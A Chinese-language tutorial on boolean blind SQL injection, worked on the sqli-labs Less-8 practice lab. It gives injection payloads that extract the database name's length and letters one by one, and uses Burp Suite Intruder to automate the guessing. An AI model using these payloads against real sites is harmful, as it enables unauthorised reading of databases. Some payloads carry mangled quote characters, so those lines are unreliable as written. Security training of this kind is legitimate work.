布尔盲注
如果确定页面注入点存在,如果页面没有回显并且没有报错信息可以考虑使用布尔盲注。
布尔盲注的判断条件是页面布尔类型状态。
当传递参数[?id=1' and 1=1 --+]
这里以sqlilab的闯关为例。
当传递参数[?id=1’ and 1=2 --+]
比较两次的传递的参数,页面明显存在差异(布尔类型状态)。
利用这个差异,我们可以一点一点得到数据库的内容。例如想要获取当前数据库的名字。
1. 判断数据库名字的长度
可以自己先猜测一下数据库的长度,假如猜想的数字是8,提交参数[?id=1’ and length(database()) = 8 --+],页面显示正常,就可以确定当前数据库名长度为8。如果页面不显示,可以用[?id=1’ and length(database()) > 8 --+] 或者 [?id=1’ and length(database()) < 8 --+] 来确定范围,再进一步的确定数据库长度。
2. 按位确定数据库名字
提交参数[?id=1’ and ord((substr(database(), 1, 1)))=115 --+],页面显示正常,可以确定当前数据库名的第一位字母的ASCII 码值为115,那就是字母[s]。
http://192.168.177.134/sql/Less-8/
?id=1’ and (substr(database(),1,1))=‘s’–+
按照这种方法我们可以确定数据库名第二个字母的ascii 值,语句如[?id=1’ and ord((substr(database(), 2, 1)))>0 --+],依次确定数据库的字母。
但是这样做太耗费时间了,所以我们可以利用一下burpsuite.
启动BP,开启浏览器代理
第一步:确定数据库为几位 发送到intruder模块
第二步:确定数据库的具体字母
提交的SQL语句:http://192.168.177.134/sql/Less-8/
?id=1’ and (substr(database(),1,1))=‘s’–+
使用BP抓包
选择 start attack 开始执行。
爆出数据库名:security。